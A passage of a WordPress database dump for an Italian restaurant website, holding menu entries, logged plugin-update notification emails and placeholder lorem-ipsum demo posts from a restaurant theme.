18:47:52','2020-12-06 17:47:52',' ','','','publish','closed','closed','','3638','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',3061,'https://www.ristorantesolymar.it/2020/12/06/3638/',38,'nav_menu_item','',0),(3639,1,'2020-12-06 18:47:52','2020-12-06 17:47:52',' ','','','publish','closed','closed','','3639','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',0,'https://www.ristorantesolymar.it/2020/12/06/3639/',10,'nav_menu_item','',0),(3640,1,'2020-12-06 18:47:52','2020-12-06 17:47:52',' ','','','publish','closed','closed','','3640','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',0,'https://www.ristorantesolymar.it/2020/12/06/3640/',10,'nav_menu_item','',0),(3641,1,'2020-12-06 18:47:52','2020-12-06 17:47:52','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide-3','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',3061,'https://www.ristorantesolymar.it/2020/12/06/five-columns-wide-3/',58,'nav_menu_item','',0),(3642,1,'2020-12-06 18:47:52','2020-12-06 17:47:52','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide-4','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',3061,'https://www.ristorantesolymar.it/2020/12/06/five-columns-wide-4/',35,'nav_menu_item','',0),(3643,1,'2020-12-06 18:47:52','2020-12-06 17:47:52','','Six Columns Wide','','publish','closed','closed','','six-columns-wide-3','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',3061,'https://www.ristorantesolymar.it/2020/12/06/six-columns-wide-3/',59,'nav_menu_item','',0),(3644,1,'2020-12-06 18:47:52','2020-12-06 17:47:52','','Six Columns Wide','','publish','closed','closed','','six-columns-wide-4','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',3061,'https://www.ristorantesolymar.it/2020/12/06/six-columns-wide-4/',36,'nav_menu_item','',0),(3645,0,'2020-12-08 01:22:37','2020-12-08 00:22:37','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated','','','2020-12-08 01:22:37','2020-12-08 00:22:37','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated/',0,'postman_sent_mail','',0),(3646,0,'2020-12-08 01:22:37','2020-12-08 00:22:37','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-2','','','2020-12-08 01:22:37','2020-12-08 00:22:37','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-2/',0,'postman_sent_mail','',0),(3647,0,'2020-12-08 13:24:22','2020-12-08 12:24:22','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Mailjet for WordPress version 5.2.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-3','','','2020-12-08 13:24:22','2020-12-08 12:24:22','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-3/',0,'postman_sent_mail','',0),(3648,0,'2020-12-08 13:24:22','2020-12-08 12:24:22','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Mailjet for WordPress version 5.2.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-4','','','2020-12-08 13:24:22','2020-12-08 12:24:22','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-4/',0,'postman_sent_mail','',0),(3649,0,'2020-12-09 01:22:42','2020-12-09 00:22:42','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.71\n- WooCommerce version 4.8.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-5','','','2020-12-09 01:22:42','2020-12-09 00:22:42','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-5/',0,'postman_sent_mail','',0),(3650,0,'2020-12-09 01:22:42','2020-12-09 00:22:42','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.71\n- WooCommerce version 4.8.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-6','','','2020-12-09 01:22:42','2020-12-09 00:22:42','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-6/',0,'postman_sent_mail','',0),(3651,0,'2020-12-11 01:23:04','2020-12-11 00:23:04','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.41 to 1.16.42)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-7','','','2020-12-11 01:23:04','2020-12-11 00:23:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-7/',0,'postman_sent_mail','',0),(3652,0,'2020-12-11 01:23:04','2020-12-11 00:23:04','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.41 to 1.16.42)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-8','','','2020-12-11 01:23:04','2020-12-11 00:23:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-8/',0,'postman_sent_mail','',0),(3653,0,'2020-12-12 13:22:49','2020-12-12 12:22:49','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed (from version 2.6.1 to 2.6.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-9','','','2020-12-12 13:22:49','2020-12-12 12:22:49','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-9/',0,'postman_sent_mail','',0),(3654,0,'2020-12-12 13:22:49','2020-12-12 12:22:49','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed (from version 2.6.1 to 2.6.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-10','','','2020-12-12 13:22:49','2020-12-12 12:22:49','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-10/',0,'postman_sent_mail','',0),(3655,0,'2020-12-14 01:24:00','2020-12-14 00:24:00','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.15 to 2.0.16)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-11','','','2020-12-14 01:24:00','2020-12-14 00:24:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-11/',0,'postman_sent_mail','',0),(3656,0,'2020-12-14 01:24:00','2020-12-14 00:24:00','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.15 to 2.0.16)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-12','','','2020-12-14 01:24:00','2020-12-14 00:24:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-12/',0,'postman_sent_mail','',0),(1688,1,'2018-08-20 10:27:32','2018-08-20 10:27:32','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Salad restaurant design','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','salad-restaurant-design','','','2018-08-20 10:27:32','2018-08-20 10:27:32','',0,'http://attika.mikado-themes.com/?p=1688',0,'post','',0),(1681,1,'2018-08-20 10:40:41','2018-08-20 10:40:41','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Fine Dinning Concept','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','fine-dinning-concept','','','2018-08-20 10:40:41','2018-08-20 10:40:41','',0,'http://attika.mikado-themes.com/?p=1681',0,'post','',3),(1677,1,'2018-08-20 10:45:16','2018-08-20 10:45:16','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Curabitur ullamcorper ultricies nisi. Nam eget dui.','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','curabitur-ullamcorper-ultricies-nisi-nam-eget-dui','','','2018-08-20 10:45:16','2018-08-20 10:45:16','',0,'http://attika.mikado-themes.com/?p=1677',0,'post','',3),(2940,1,'2018-09-17 11:00:45','2018-09-17 11:00:45','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Red Dream','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','red-dream-2','','','2018-09-17 11:00:45','2018-09-17 11:00:45','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2940',0,'portfolio-item','',0),(3770,1,'2018-08-20 11:00:58','2018-08-20 11:00:58','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Some fresh recepies','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','some-fresh-recepies','','','2018-08-20 11:00:58','2018-08-20 11:00:58','',0,'http://attika.mikado-themes.com/?p=6',0,'post','',3),(2937,1,'2018-09-17 10:58:43','2018-09-17 10:58:43','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Ice Dream','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','ice-dream-3','','','2018-09-17 10:58:43','2018-09-17 10:58:43','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2937',0,'portfolio-item','',0),(2932,1,'2018-09-17 10:58:24','2018-09-17 10:58:24','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Garden Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','garden-salad-2','','','2018-09-17 10:58:24','2018-09-17 10:58:24','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2932',0,'portfolio-item','',0),(2933,1,'2018-09-17 10:58:24','2018-09-17 10:58:24','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Sushi','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','sushi-2','','','2018-09-17 10:58:24','2018-09-17 10:58:24','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2933',0,'portfolio-item','',0),(1459,1,'2018-08-16 10:39:41','2018-08-16 10:39:41','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','New meals in Attika','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','new-meals-in-attika','','','2018-08-16 10:39:41','2018-08-16 10:39:41','',0,'http://attika.mikado-themes.com/?p=1459',0,'post','',0),(1446,1,'2018-08-16 10:33:30','2018-08-16 10:33:30','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Lunch is on the table','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','lunch-is-on-the-table','','','2018-08-16 10:33:30','2018-08-16 10:33:30','',0,'http://attika.mikado-themes.com/?p=1446',0,'post','',0),(2903,1,'2018-09-17 07:46:30','2018-09-17 07:46:30','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit.[/vc_column_text][/vc_column][/vc_row]','Taste Sweet Dream','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','taste-sweet-dream','','','2018-09-17 07:46:30','2018-09-17 07:46:30','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2903',0,'portfolio-item','',0),(2930,1,'2018-09-17 10:58:06','2018-09-17 10:58:06','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit.[/vc_column_text][/vc_column][/vc_row]','M&K Fruit','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','mk-fruit-2','','','2018-09-17 10:58:06','2018-09-17 10:58:06','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2930',0,'portfolio-item','',0),(2901,1,'2018-09-17 07:45:46','2018-09-17 07:45:46','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam 